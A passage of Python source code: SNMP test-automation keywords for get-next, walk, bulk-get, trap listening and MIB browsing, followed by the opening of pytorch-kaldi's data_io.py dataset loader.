different no.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
10.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
11.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
12.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
13.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
14.privProtocols(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2)'
15.custom_mib_paths: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
16.load_mib_module: User can provide the MIBS(name) need to be loaded from the path
"custom_mib_path".It is a string of MIB names separated by comma(',')
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP GETNEXT command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
if self.snmpver.get(snmp_ver) is '2':# for ssnmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus, errindex, \
result = cmdgen.nextCmd(auth_data,
transport, oid,
ignoreNonIncreasingOid=True, maxRows=int(max_rows),
lookupNames=True, lookupValues=True, lexicographicMode=True)
# maxRows=1 will control the mib walk
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP GET-NEXT "
"command {}".format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {} {} {} {} xyz".
format(result, errindication, errstatus, errindex), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP GET-Next command Failed! \n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_walk(self, snmp_ver, system_name, mib_name=None, mib_index=None,
mib_value=None, oid_string=None, communityname=None,
snmp_timeout=60, userName=None, authKey=None, privKey=None,
authProtocol=None, privProtocol=None, custom_mib_paths=None,
load_mib_modules=None, lexicographicMode="False"):
"""
snmp_walk uses the SNMP WALK request to query for information on
a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
8. snmp_timeout: Number of seconds the SNMP manager will wait for a
responce from SNMP Agent. In case of SNMP walk the may need to
set to higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
9.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
10.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
11.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
12.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
13.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2'
14.custom_mib_paths: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
15.load_mib_modules: User can provide the MIBS(name) need to be loaded from the path
"custom_mib_path". It is a string of MIB names separated by comma(',')
16.lexicographicMode : "True" will return everything under given prefix plus the next
table also e.g. if request 1.3.6.1 will also provide 1.3.6.2$
"False" will return only under given prefix. Default its False.
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP WALK command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
if self.snmpver.get(snmp_ver) is '2':# for snmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string: #OID String is optional
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index)
try:
errindication, errstatus, errindex,\
result = cmdgen.nextCmd(auth_data,
transport,
oid, lexicographicMode=ast.literal_eval(lexicographicMode.
capitalize()),
ignoreNonIncreasingOid=True, maxRows=50000,
lookupNames=True, lookupValues=True)
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP WALK command {}".
format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {} {} {}".
format(result, errindication.prettyPrint(),
errstatus.prettyPrint()), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP Walk command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_bulkget(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60, nonrepeaters='0', maxrepetitions='10',
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None, custom_mib_paths=None, load_mib_modules=None,
lexicographicMode="False"):
"""
snmp_bulkget uses the SNMP BULKGET request to query for information on
a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
9. snmp_timeout: Number of seconds the SNMP manager will wait for a
responce from SNMP Agent. In case of SNMP walk the may need to
set to higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
10.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
11.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
12.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
13.authProtocol(string) = An indication of whether messages sent on behalf of this
USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol='1,3,6,1,6,3,10,1,1,2'
14.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol='1,3,6,1,6,3,10,1,2,2'
15.custom_mib_paths: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
16.load_mib_modules: User can provide the MIBS(name) need to be loaded from the
path "custom_mib_path".
It is a string of MIB names separated by comma(',')
17.lexicographicMode : "True" will return everything under given prefix plus the next
table also e.g. if request 1.3.6.1 will also provide 1.3.6.2
"False" will return only under given prefix. Default its False.
18. maxrepetitions: This specifies the maximum number of iterations over the
repeating variables. The default is 10.
19. nonrepeaters : This specifies the number of supplied variables that should not be
iterated over. default is 0
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates
the SNMP engine error.
2.errstatus: If this element evaluates to True,it indicates an error
in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error.
The object position in the result array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP BULKGET command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol, privProtocol)
cmdgen = wsnmp.commandgenerator()
if self.snmpver.get(snmp_ver) is '2':# for ssnmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit()
else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus, errindex, \
result = cmdgen.bulkCmd(auth_data,
transport, int(nonrepeaters), int(maxrepetitions), oid,
lookupNames=True, lookupValues=True,
lexicographicMode=ast.literal_eval(
lexicographicMode.capitalize()),
maxRows=int(maxrepetitions))
# nonrepeaters(1)(int): One MIB variable is requested in response
# for the first nonRepeaters MIB variables in request.
# maxRepetitions(25)(int): maxRepetitions MIB variables are
# requested in response for each of the remaining MIB variables in
# the request (e.g. excluding nonRepeaters). Remote SNMP engine may
# choose lesser value than requested.
output_dict = {
'{0}_errindication'.format(system_name): errindication,
'{0}_errstatus'.format(system_name): errstatus,
'{0}_errindex'.format(system_name): errindex,
'{0}_result'.format(system_name): result,
'{0}_custom_mib_paths'.format(system_name): temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name): load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP BULK GET "
"command {}".format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {}".
format(result), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP BULK GET command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def verify_snmp_action(self, system_name, snmp_result, mib_string=None):
"""
Will Verify SNMP get/getnext/walk/getbulk actions.
:Datafile usage:
NA
:Arguments:
1. system_name(string) = Name of the system from the input datafile
2. mib_string(string) = MIB string
e.g.'SNMPv2-SMI::enterprises.3861.3.2.100.1.2.0'
3. result(string) = SNMP Output string
e.g. '1Finity-T100'
:Returns:
1. status(bool)
"""
wdesc = "Verify the SNMP Action Results"
Utils.testcase_Utils.pSubStep(wdesc)
errindication = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_errindication")
varBindTable = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_result")
errorstatus = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_errstatus")
errindex = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_errindex")
custom_mib_paths = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_custom_mib_paths")
load_mib_modules = Utils.data_Utils.get_object_from_datarepository(
str(system_name)+"_load_mib_modules")
#Non-empty errorIndication string indicates SNMP engine-level error.
#The pair of errorStatus and errorIndex variables determines SNMP
#PDU-level error. If errorStatus evaluates to true, this indicates SNMP
#PDU error caused by Managed Object at position errorIndex-1 in \
#varBinds. Doing errorStatus.prettyPrint() would return an
# explanatory text error message.
result_list = []
status = False
if errindication:
testcase_Utils.pNote("%s" % errindication.prettyPrint())
else:
if errorstatus:
testcase_Utils.pNote('%s at %s' % (errorstatus.prettyPrint(),
errindex and
varBindTable[-1][int(errindex)-1][0]or '?'))
else:
if varBindTable:
if type(varBindTable[0]) is not list:
# for SNMP Get/Get-Next output only
for name, val in varBindTable:
result_list.append(snmp_utils.translate_mib(
custom_mib_paths, load_mib_modules, name, val))
else:
# for SNMP Getbulk/walk output only
for varBindTableRow in varBindTable:
for name, val in varBindTableRow:
result_list.append(snmp_utils.translate_mib(
custom_mib_paths, load_mib_modules, name, val))
else:
testcase_Utils.pNote("No SNMP Result Present!", 'error')
for element in result_list:
if mib_string:
if mib_string in element[0] and snmp_result in element[-1]:
status = True
testcase_Utils.pNote('%s and %s found in SNMP Output' %(
mib_string, snmp_result))
break
else:
if snmp_result in element[-1]:
status = True
testcase_Utils.pNote('%s Found! in SNMP Output' %(
snmp_result))
break
if status == False:
if mib_string:
testcase_Utils.pNote('{} and {} NOT Found in SNMP Output'.format(
mib_string, snmp_result))
else:
testcase_Utils.pNote('{} NOT Found in SNMP Output'.format(snmp_result))
Utils.testcase_Utils.report_substep_status(status)
return status
def add_snmp_v3_user(self, port, username, securityEngineId,
authkey=None, privkey=None,
authProtocol=None, privProtocol=None):
"""
Add SNMP V3 User for TRAP and Inform
Argument:
1. port: SNMP trap or inform port.
2. username(string) = snmp v3 username.
3. securityEngineId(string) = SNMP v3 secure engine id which is a mandatory
argument for any V3 user. both sender and
receiver should know this id.
refer: http://www.net-snmp.org/tutorial/tutorial-5
/commands/snmptrap-v3.html
4.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
5.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
6.authProtocol(string) = An indication of whether messages sent on behalf of
this USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol="1,3,6,1,6,3,10,1,1,2"
7.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol,
usmAesCfb128Protocol
e.g. privProtocol="1,3,6,1,6,3,10,1,2,2"
Return: True or False
"""
status = True
wdesc = "Add SNMP V3 User for TRAP and Inform"
Utils.testcase_Utils.pSubStep(wdesc)
status = ws.add_user(port, username, securityEngineId,
authkey, privkey, authProtocol, privProtocol)
Utils.testcase_Utils.report_substep_status(status)
return status
def add_snmp_community(self, port, community_string):
"""
Add the SNMP community string
:param port: SNMP TRAP or Inform PORT
:param community_string: SNMP community String
:return:
"""
status = True
status = ws.add_community(port, community_string)
Utils.testcase_Utils.report_substep_status(status)
return status
def start_trap_listener(self, system_name,
custom_mib_path=None,
load_mib_module='SNMPv2-MIB,SNMP-COMMUNITY-MIB'):
"""
Start trap listener on Given port and IP address. It creates a socket
with given port and ip.The Trap listner is only for SNMP v1 and v2c and v3.
Arguments:
system_name: SNMP Agents system name from the data file.
custom_mib_path: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
load_mib_module: User can provide the MIBS(name) need to be loaded from the
path "custom_mib_path".
It is a string of MIB names separated by comma(',')
e.g. "FSS-COMMON-TC,FSS-COMMON-LOG,FSS-COMMON-SMI"
Data File Usage:
<ip> : Ip of the agent. It has to be IP not a hostname.
<snmp_port>: SNMP Port. UDP port e.g. 161 or 1036.
<snmp_trap_port> : SNMP trap port. UDP port e.g. 162 or any othe custom port.1036
if NESNMP or any other SNMP protocol is using the 162 port
please use any other port other than 162.
<community>: form this release community string is mandatory for v2 and v1 SNMP trap.
you can add multiple community like 'public,testing' or single like
'public'
<snmp_username>: For SNMP v3 this and engine id are mandatory argument.
e.g. 'user_snmp1234'
<securityEngineId>: One mandatory argument for V3 trap and inform.
e.g. '80000F150000000000000000'.
For noAuthNoPriv none of the bellow attributes are required.
<authkey>: Auth password. e.g. 'authkey123'
<authProtocol>: authProtocol e.g. 'usmHMACMD5AuthProtocol'
authProtocol(string) = An indication of whether messages
sent on behalf of this USM user
can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
<privkey>: private key e.g. 'privkey1'
<privProtocol>: privProtocol e.g. 'usmDESPrivProtocol'
privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
Return: True or False
"""
status = True
wdesc = "Starting Trap listener"
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port', 'community', 'snmp_username',
'securityEngineId', 'authkey', 'privkey',
'authProtocol', 'privProtocol']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
community = snmp_param_dic.get('community', None)
username = snmp_param_dic.get('snmp_username', None)
securityEngineId = snmp_param_dic.get('securityEngineId', None)
privkey = snmp_param_dic.get('privkey', None)
authkey = snmp_param_dic.get('authkey', None)
authProtocol = snmp_param_dic.get('authProtocol', None)
privProtocol = snmp_param_dic.get('privProtocol', None)
engine = ws.get_asyncoredispatcher(port)
ntfrcv.NotificationReceiver(engine, ws.trap_decoder)
ws.data_repo.update({"custom_mib_path": custom_mib_path,
"load_mib_module": load_mib_module})
trap_listner_job = Thread(target=ws.create_trap_listner_job, args=(port, ))
trap_listner_job_start = Thread(target=ws.start_trap_listner_job, args=(port,))
trap_listner_job.daemon = True
trap_listner_job_start.daemon = True
trap_listner_job.start()
if community:
stats = ws.add_community(port, community)
status = status and stats
if username and securityEngineId:
stats = self.add_snmp_v3_user(port, username, securityEngineId, authkey, privkey,
authProtocol, privProtocol)
status = status and stats
sleep(1)
trap_listner_job_start.start()
sleep(2)
Utils.testcase_Utils.report_substep_status(status)
return status
def stop_trap_listener(self, system_name):
"""
Stop Trap listener job
Argument:
system_name: Agent system name given in the data file.
:return: Binary True or False
"""
status = True
wdesc = "Stop Trap listener"
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
stop_list = Thread(target=ws.close_trap_listner_job, args=(port,))
stop_list.daemon = True
stop_list.start()
stop_list.join()
Utils.testcase_Utils.report_substep_status(status)
return status
def validate_trap(self, system_name, value, oid_string=None, match_oid_op_value_pair="no"):
"""
This method will validate the Received traps from a agent.
Argument:
1. system_name: Agent System name from the data file
2. value: The tarp infromation e.g. 'Administrative State Down'
3. oid_string: MIB string e.g. 'FSS-COMMON-LOG::fssTrapDescription.0'
3. match_oid_op_value_pair: if set as 'yes' it will match both
oid_string and value as a pair. Default value 'no'
:return: Binary True or False
"""
stats = []
status = False
wdesc = "Validate the Received Trap Messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
op_trap = ws.data_repo.get("snmp_trap_messages_{}".format(agent_ip))
if op_trap:
testcase_Utils.pNote("Total No# {} of Trap message(s) Received from {}"
.format(len(op_trap), agent_ip))
for temp_list in op_trap:
for items in temp_list[4:]:
if match_oid_op_value_pair.lower() == "no":
if value and value in items[1]:
testcase_Utils.pNote("Value# {} is present in: \n# {} = {}"
.format(value, items[0], items[1]))
stats.append(True)
break
elif oid_string and value:
if oid_string in items[0] and value in items[1]:
testcase_Utils.pNote("OID #{} and Value #{} is present in: \n# {} = {}"
.format(oid_string, value, items[0], items[1]))
stats.append(True)
break
if True in stats:
break
if True in stats:
break
else:
testcase_Utils.pNote("No Trap Received!", "error")
if True in stats:
status = True
else:
if value and oid_string:
testcase_Utils.pNote("OID #{} and Value #{} is NOT Present!"
.format(oid_string, value), "error")
else:
testcase_Utils.pNote("Value #{} is NOT present!".format(oid_string, value), "error")
Utils.testcase_Utils.report_substep_status(status)
return status
def show_received_traps(self, system_name):
"""
Retrieve the captured SNMP Trap messages and show them in the console.
Argument:
system_name: Agent system name from data file.
Return: Binary- True or False
"""
status = True
wdesc = "List out the trap messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_trap_port')
sleep(5)
op_trap = ws.data_repo.get("snmp_trap_messages_{}".format(agent_ip))
if op_trap:
testcase_Utils.pNote("Total No# {} of Trap message(s) Received from {}"
.format(len(op_trap), agent_ip))
for temp_list in op_trap:
ticks = temp_list[0].get("time_stamp")
contextengineid = temp_list[1].get("contextEngineId")
snmpver = temp_list[2].get("SNMPVER")
securityname = temp_list[3].get("securityName")
testcase_Utils.pNote(" --------->>Notification message"
"(Time Stamp:{})<<------- \n From: {}:\n "
"contextEngineId :{}\n SNMPVER :{}\n securityName: {}"
.format(ticks, agent_ip, contextengineid,
snmpver, securityname))
testcase_Utils.pNote("--------------")
for items in temp_list[4:]:
testcase_Utils.pNote("{} = {}".format(items[0], items[1]))
else:
testcase_Utils.pNote("No Trap Received from {}!".format(agent_ip), "error")
status = False
Utils.testcase_Utils.report_substep_status(status)
return status
def browse_mib(self, mib_filepath, mib_filename, browse='yes'):
"""
Browse the MIB File/single or multiple
:param mib_filepath: Mib file path of the git url or abs file path
:param mib_filename: MIB file name
:param browse: Default value is 'yes' were only browse the mentioned MIBS
mib_filename argument,if set 'no' will browse all the Mibs in the given Path
:return: True or False
"""
status = True
wdesc = "Browse the MIB File"
Utils.testcase_Utils.pSubStep(wdesc)
oid, label, suffix, mibView, mibBuilder = ws.get_first_node_name(mib_filepath,
mib_filename)
temp_modName, nodeDesc, suffix = mibView.getNodeLocation(oid)
while 1:
try:
modName, nodeDesc, suffix = mibView.getNodeLocation(oid)
mibNode, = mibBuilder.importSymbols(modName, nodeDesc)
nodetype = re.search(r"([\w]+)\(", str(mibNode)).group(1)
if browse.lower() == 'yes':
if modName in mib_filename:
if nodetype == 'MibScalar':
testcase_Utils.pNote('%s %s -> %s == %s' % (
'$$', nodetype, modName+'::'+nodeDesc+'.0',
'.'.join(map(str, oid))+'.0'))
else:
testcase_Utils.pNote('** %s -> %s == %s' % (
nodetype, modName+'::'+nodeDesc, '.'.join(map(str, oid))))
elif browse.lower() == 'no':
if nodetype == 'MibScalar':
testcase_Utils.pNote('%s %s -> %s == %s' % (
'$$', nodetype, modName+'::'+nodeDesc+'.0',
'.'.join(map(str, oid))+'.0'))
else:
testcase_Utils.pNote('** %s -> %s == %s' % (
nodetype, modName+'::'+nodeDesc, '.'.join(map(str, oid))))
oid, label, suffix = mibView.getNextNodeName(oid)
except error.SmiError:
break
Utils.testcase_Utils.report_substep_status(status)
return status
def clear_received_traps(self, system_name):
"""
Clear the captured SNMP Trap messages stored in the repository.
Argument:
system_name: Agent system name from data file.
Return: Binary- True or False
"""
status = True
wdesc = "Clear trap messages from {}".format(system_name)
Utils.testcase_Utils.pSubStep(wdesc)
snmp_parameters = ['ip', 'snmp_trap_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
agent_ip = snmp_param_dic.get('ip')
agent_ip = socket.gethostbyname(agent_ip)
clear_val = []
ws.data_repo.update({"snmp_trap_messages_{}".format(agent_ip): clear_val})
Utils.testcase_Utils.report_substep_status(status)
return status
|
data_io.py
|
##########################################################
# pytorch-kaldi v.0.1
# Mirco Ravanelli, Titouan Parcollet
# Mila, University of Montreal
# October 2018
##########################################################
import numpy as np
import sys
from utils import compute_cw_max,dict_fea_lab_arch,is_sequential_dict
import os
import configparser
import re, gzip, struct
def load_dataset(fea_scp,fea_opts,lab_folder,lab_opts,left,right, max_sequence_length, output_folder, fea_only=False):
def _input_is_wav_file(fea_scp):
with open(fea_scp, 'r') as f:
first_line = f.readline()
ark_file = first_line.split(' ')[1].split(':')[0]
with open(ark_file, 'rb') as f:
first_ark_line = f.readline()
return b'RIFF' in first_ark_line
def _input_is_feature_file(fea_scp):
return not _input_is_wav_file(fea_scp)
def _read_features_and_labels_with_kaldi(fea_scp, fea_opts, fea_only, lab_folder, lab_opts, output_folder):
fea = dict()
lab = dict()
if _input_is_feature_file(fea_scp):
kaldi_bin="copy-feats"
read_function = read_mat_ark
elif _input_is_wav_file(fea_scp):
kaldi_bin="wav-copy"
read_function = read_vec_flt_ark
fea = { k:m for k,m in read_function('ark:'+kaldi_bin+' scp:'+fea_scp+' ark:- |'+fea_opts,output_folder) }
if not fea_only:
lab = { k:v for k,v in read_vec_int_ark('gunzip -c '+lab_folder+'/ali*.gz | '+lab_opts+' '+lab_folder+'/final.mdl ark:- ark:-|',output_folder) if k in fea} # Note that I'm copying only the aligments of the loaded fea
fea = {k: v for k, v in fea.items() if k in lab} # This way I remove all the features without an aligment (see log file in alidir "Did not Succeded")
return fea, lab
def _chunk_features_and_labels(max_sequence_length, fea, lab, fea_only, input_is_wav):
def _append_to_concat_list(fea_chunked, lab_chunked, fea_conc, lab_conc, name):
for j in range(0, len(fea_chunked)):
